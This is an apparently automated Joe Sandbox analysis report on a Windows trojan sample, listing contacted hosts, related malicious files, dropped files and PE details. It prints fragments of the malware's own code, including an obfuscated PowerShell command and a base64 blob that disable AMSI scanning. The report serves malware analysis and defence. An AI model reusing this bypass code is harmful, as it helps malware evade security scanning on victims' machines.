                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://fontfabrik.comexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.founder.com.cn/cnexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.jiyu-kobo.co.jp/explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers8explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.fonts.comexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.sandoll.co.krexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.urwpp.deDPleaseexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.zhongyicts.com.cnexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.sakkal.comexplorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        192.185.17.130
                                        rajuherbalandspicegarden.comUnited States
                                        46606UNIFIEDLAYER-AS-1UStrue
                                        162.159.134.233
                                        cdn.discordapp.comUnited States
                                        13335CLOUDFLARENETUSfalse

                                        General Information

                                        Joe Sandbox Version:33.0.0 White Diamond
                                        Analysis ID:452684
                                        Start date:22.07.2021
                                        Start time:17:58:33
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 11m 3s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:s2rsXUiUn8 (renamed file extension from none to exe)
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:28
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@10/6@5/2
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 54% (good quality ratio 48.4%)
                                        • Quality average: 73.4%
                                        • Quality standard deviation: 32%
                                        HCA Information:
                                        • Successful, ratio: 97%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                        • TCP Packets have been reduced to 100
                                        • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.139.144, 92.122.145.220, 23.35.236.56, 20.82.209.183, 23.216.77.146, 23.216.77.132, 40.112.88.60, 20.50.102.62, 2.18.213.74, 2.18.213.56
                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/452684/sample/s2rsXUiUn8.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        17:59:27API Interceptor42x Sleep call for process: powershell.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        162.159.134.233VMKwliCGEP.rtfGet hashmaliciousBrowse
                                        • cdn.discordapp.com/attachments/785611664095313920/785649743954706472/bin.exe

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        cdn.discordapp.comPO20210722.xlsxGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        RIi1iCfuVK.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        kkXJRT8vEl.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        r3xwkKS58W.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        P58w6OezJY.exeGet hashmaliciousBrowse
                                        • 162.159.129.233
                                        4QKHQR82Xt.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        Swift_Fattura_0093320128_.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        ySZpdJfqMO.exeGet hashmaliciousBrowse
                                        • 162.159.129.233
                                        6BeKYZk7bg.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        Wcqwghjdefrkaiamzhtbgtpbmolvfnoxik.exeGet hashmaliciousBrowse
                                        • 162.159.135.233
                                        Wcqwghjdefrkaiamzhtbgtpbmolvfnoxik.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        Invoice 41319 from AGUA.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        BoFA Remittance Advice-2021207.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        WmI15xdQH8.exeGet hashmaliciousBrowse
                                        • 162.159.135.233
                                        lpaBPnb1OB.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        Hsbc Scan copy 3547856788 Pdf.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        Statement.xlsxGet hashmaliciousBrowse
                                        • 162.159.135.233
                                        PO20210719.docxGet hashmaliciousBrowse
                                        • 162.159.135.233
                                        Wesnvuotnnnxvacefgejmjccyfnnrjmdmc.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        Wesnvuotnnnxvacefgejmjccyfnnrjmdmc.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        google.comPO20210722.xlsxGet hashmaliciousBrowse
                                        • 216.58.215.238
                                        ORD.pptGet hashmaliciousBrowse
                                        • 172.217.168.9
                                        ORD.pptGet hashmaliciousBrowse
                                        • 172.217.168.9
                                        rrnIEffG4c.exeGet hashmaliciousBrowse
                                        • 172.217.168.36
                                        Requesting Prices.exeGet hashmaliciousBrowse
                                        • 172.217.168.36

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        UNIFIEDLAYER-AS-1US85vLO1Rpcy.exeGet hashmaliciousBrowse
                                        • 162.241.62.54
                                        v8kZUFgdD4.exeGet hashmaliciousBrowse
                                        • 162.241.62.54
                                        ovLjmo5UoEGet hashmaliciousBrowse
                                        • 173.254.89.32
                                        wREFu91LXZ.exeGet hashmaliciousBrowse
                                        • 50.87.248.20
                                        PURCHASE ORDER-890003.exeGet hashmaliciousBrowse
                                        • 50.87.146.199
                                        SvmxfeZM5ZGet hashmaliciousBrowse
                                        • 192.254.185.125
                                        ehn0f1d63MGet hashmaliciousBrowse
                                        • 162.144.19.10
                                        qt75NPEt0tGet hashmaliciousBrowse
                                        • 50.87.73.248
                                        e4qhQIKEimGet hashmaliciousBrowse
                                        • 74.91.251.235
                                        #U55aeInquiry RFQ_SK20211907.docGet hashmaliciousBrowse
                                        • 162.214.203.69
                                        QxnlprRUTx.exeGet hashmaliciousBrowse
                                        • 162.241.62.54
                                        Af1Fnq4I4GGet hashmaliciousBrowse
                                        • 76.162.184.193
                                        FN0ZF2Nm21Get hashmaliciousBrowse
                                        • 173.83.209.249
                                        DHL 07988 AWB 202107988.xlsxGet hashmaliciousBrowse
                                        • 192.185.35.125
                                        Order.exeGet hashmaliciousBrowse
                                        • 108.179.243.90
                                        Audit Notice.exeGet hashmaliciousBrowse
                                        • 173.254.28.216
                                        ohVyGMo5ga.exeGet hashmaliciousBrowse
                                        • 192.185.121.104
                                        UwQ0OtK2xW.exeGet hashmaliciousBrowse
                                        • 50.87.218.82
                                        pago.exeGet hashmaliciousBrowse
                                        • 192.254.187.108
                                        bank swift... Scan pdf.exeGet hashmaliciousBrowse
                                        • 192.185.164.148

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        37f463bf4616ecd445d4a1937da06e19VNDRAUS20ARSHR0000067621.xlsxGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        V3FoZFwKDB.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        kS2dqbsDwD.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        Nb2HQZZDIf.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        #U00e2_#U00e2_Play _to _Listen.htmGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        41609787.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        B5xK9XEvzO.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        RsEvjI1iTt.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        ORD.pptGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        39pfFwU3Ns.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        47a8af.exe.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        Comprobante1.vbsGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        ZlvFNj.dllGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        QT2kxM315B.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        4QKHQR82Xt.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        Convert HEX uit phishing mail.htmGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        #U2706_#U260e_Play _to _Listen.htmGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        192-3216-Us.gt.com.htmlGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        N41101255652.vbsGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        FILE_2932NH_9923.exeGet hashmaliciousBrowse
                                        • 162.159.134.233

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\oad[1].jpg
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines, with no line terminators
                                        Category:dropped
                                        Size (bytes):2026850
                                        Entropy (8bit):4.762681838766658
                                        Encrypted:false
                                        SSDEEP:12288:BgrUL/QryYqJOkK82HIUHvDcZIyy/hBc2T1odg+GfVwZQIzbiVgFvC4nPuoHMcnS:i
                                        MD5:7E40951D41A43B25F38C6DD25DC4BFE3
                                        SHA1:D389E4ED359D16981FF0E05739AC4C4A96311C60
                                        SHA-256:64A73E000DC919BC362CEA33F87549DA0D847C16F826E62138BF269006EF8C1C
                                        SHA-512:17782CE108E5B7443D69CF024E497D33A3D9A2A39E155A34E3BD59832F447C31EF4DD75E2FAF1B381F38691CCF9E11FB6D579896D999E5097BE1700A5AA17E01
                                        Malicious:false
                                        Reputation:low
                                        Preview: V3JpdGUtVmVyYm9zZSAiR2V0LURlY29tcHJlc3NlZEJ5dGVBcnJheSI7JGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nO1dyaXRlLVZlcmJvc2UgIkdldC1EZWNvbXByZXNzZWRCeXRlQXJyYXkiOyRhPSRhPVdyaXRlLUhvc3QgJ3syNzgxNzYxRS0yOEUwLTQxMDktOTlGRS1COUQxMjdDNTdBRkV9JzskYSA9IFtSZWZdLkFzc2VtYmx5LkdldFR5cGUoJ1N5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uQW1zaVV0JysnaWxzJykKJGggPSAiNDQ1NjYyNTIyMDU3NTI2MzE3NDQ1MjU1NDg0NyIKJHMgPSBbc3RyaW5nXSgwLi4xM3wle1tjaGFyXVtpbnRdKDUzKygkaCkuc3Vic3RyaW5nKCgkXyoyKSwyKSl9KS1yZXBsYWNlICIgIgokYiA9ICRhLkdldEZpZWxkKCRzLCdOb25QdWJsaWMsU3RhdGljJykKJGIuU2V0VmFsdWUoJG51bGwsJHRydWUpOyAkYT0kYT1Xcml0ZS1Ib3N0ICd7Mjc4MTc2MUUtMjhFMC00MTA5LTk5RkUtQjlEMTI3QzU3QUZFfSc7JGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nOyRhPSRhPVdyaXRlLUhvc3QgJ3syNzgxNzYxRS0yOEUwLTQxMDktOTlGRS1COUQxMjdDNTdBRkV9JzskYT0kYT1Xcml0ZS1Ib3N0ICd7Mjc4MTc2MUUtMjhFMC00MTA5LTk5RkUtQjlEMTI3QzU3QUZFfSc7CldyaXRlLUhvc3QgIisrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysr
                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):11606
                                        Entropy (8bit):4.883977562702998
                                        Encrypted:false
                                        SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                                        MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                                        SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                                        SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                                        SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                                        Malicious:false
                                        Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1352
                                        Entropy (8bit):5.370926585110904
                                        Encrypted:false
                                        SSDEEP:24:3YPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJfMoOBq+Y:IPerB4nqRL/HvFe9t4Cv94afMoOBq+Y
                                        MD5:5A7C43375E2B3C9D028C036F7E199FDF
                                        SHA1:0B83ACEFE60D292C1A76DCEA7160D6E14D2FAA77
                                        SHA-256:04DC7F291DA8492242C8386028CC4D8DAB5ADA6DDA60A08677495495E2A6F6A8
                                        SHA-512:420D7C9467B1087D3E01BA4DFC76348DCDB97A61B5FA8A52BA167E566D4859220843EFDD64B650183BFA2E4D7E5C454FD21CF89D95F79AC13E671AAE8BC627AB
                                        Malicious:false
                                        Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1pghm4uj.4m1.ps1
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlvkzbwx.aab.psm1
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview: 1
                                        C:\Users\user\Documents\20210722\PowerShell_transcript.965543.TYqX5dwv.20210722175925.txt
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):10447
                                        Entropy (8bit):4.196049168281877
                                        Encrypted:false
                                        SSDEEP:192:l2Giw/GOrwwJYZbKIDFs+xS2Giw/GOrwwJYZbKIDFs+xrL99999L:Ezw/GOrwwJYgIDFVxlzw/GOrwwJYgIDX
                                        MD5:2A0D140A36C556BC4C74DF793E698D99
                                        SHA1:299D4F22830E4FF96EC8093F77B29C93779B9E41
                                        SHA-256:A090D1E73A91DDFD68E472ADD0FE24FBCF94505500A111CEF0D4642E529DA9CB
                                        SHA-512:289F7991CD626D87AE6661820338737A85B486FA907D49696F1F62CCBE8EB707B7A22EF5AFA5FCEF18E140A19AF9E0E669F111D51FDCB6B04F54B420E51A20C3
                                        Malicious:false
                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210722175925..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 965543 (Microsoft Windows NT 10.0.17134.0)..Host Application: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,3

                                        Static File Info

                                        General

                                        File type:PE32+ executable (console) x86-64, for MS Windows
                                        Entropy (8bit):6.055482508518817
                                        TrID:
                                        • Win64 Executable Console (202006/5) 92.64%
                                        • Win64 Executable (generic) (12005/4) 5.51%
                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                        • DOS Executable Generic (2002/1) 0.92%
                                        • VXD Driver (31/22) 0.01%
                                        File name:s2rsXUiUn8.exe
                                        File size:26624
                                        MD5:f5041ec4ce468a07ecbfd076bc0f879b
                                        SHA1:bda8cea1ec8d1cea253fc661559cd84cee2195b9
                                        SHA256:caff14d450514a35eac5ba34b3e74126360662d7c8fdf60a8008a0e3bb8ed0b3
                                        SHA512:4e64a727da994675aa7517f260d639691f6a94bc9c510ddde9d54f2f6e7f005b8b799eeea1d9aad1dc5128290654fa884a4aa0e397f96444914a067b8bd15c88
                                        SSDEEP:768:ko9xN+bR7ftwwAqCnv/sx3OfEbR7t6ll:nPwbR8t/3MR7AP
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...h..`..........'..........H................@............................................... ............................

                                        File Icon

                                        Icon Hash:00828e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint:0x4014e0
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows cui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                        DLL Characteristics:
                                        Time Stamp:0x60F1F868 [Fri Jul 16 21:21:44 2021 UTC]
                                        TLS Callbacks:0x40dba0
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:eb4027891a3c2b24db6240a4f60e56ad

                                        Entrypoint Preview

                                        Instruction
                                        dec eax
                                        sub esp, 28h
                                        dec eax
                                        mov eax, dword ptr [00003FB5h]
                                        mov dword ptr [eax], 00000000h
                                        call 00007FEB90DF4A9Fh
                                        call 00007FEB90DF456Ah
                                        nop
                                        nop
                                        dec eax
                                        add esp, 28h
                                        ret
                                        nop dword ptr [eax+00h]
                                        nop word ptr [eax+eax+00000000h]
                                        dec eax
                                        sub esp, 28h
                                        call 00007FEB90DF5EACh
                                        dec eax
                                        test eax, eax
                                        sete al
                                        movzx eax, al
                                        neg eax
                                        dec eax
                                        add esp, 28h
                                        ret
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        dec eax
                                        lea ecx, dword ptr [00000009h]
                                        jmp 00007FEB90DF48B9h
                                        nop dword ptr [eax+00h]
                                        ret
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        push ebp
                                        dec eax
                                        mov ebp, esp
                                        dec eax
                                        sub esp, 30h
                                        mov dword ptr [ebp+10h], ecx
                                        dec eax
                                        mov dword ptr [ebp+18h], edx
                                        call 00007FEB90DF49F1h
                                        dec eax
                                        mov eax, dword ptr [00007CA5h]
                                        call eax
                                        dec eax
                                        mov dword ptr [ebp-08h], eax
                                        dec eax
                                        mov eax, dword ptr [ebp-08h]
                                        mov edx, 00000006h
                                        dec eax
                                        mov ecx, eax
                                        dec eax
                                        mov eax, dword ptr [00007E1Ch]
                                        call eax
                                        dec eax
                                        mov eax, dword ptr [ebp-08h]
                                        mov edx, 00000000h
                                        dec eax
                                        mov ecx, eax
                                        dec eax
                                        mov eax, dword ptr [00007E07h]
                                        call eax
                                        mov edx, 00000000h
                                        dec eax
                                        lea ecx, dword ptr [00002A59h]

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x90000x7e8.idata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0xcc500x270.vmp0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x50a00x28.rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x92000x1b0.idata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x1d280x1e00False0.581510416667data5.9205123354IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .data0x30000xd00x200False0.130859375data0.806747366598IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .rdata0x40000x15300x1600False0.352450284091data4.41763079769IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
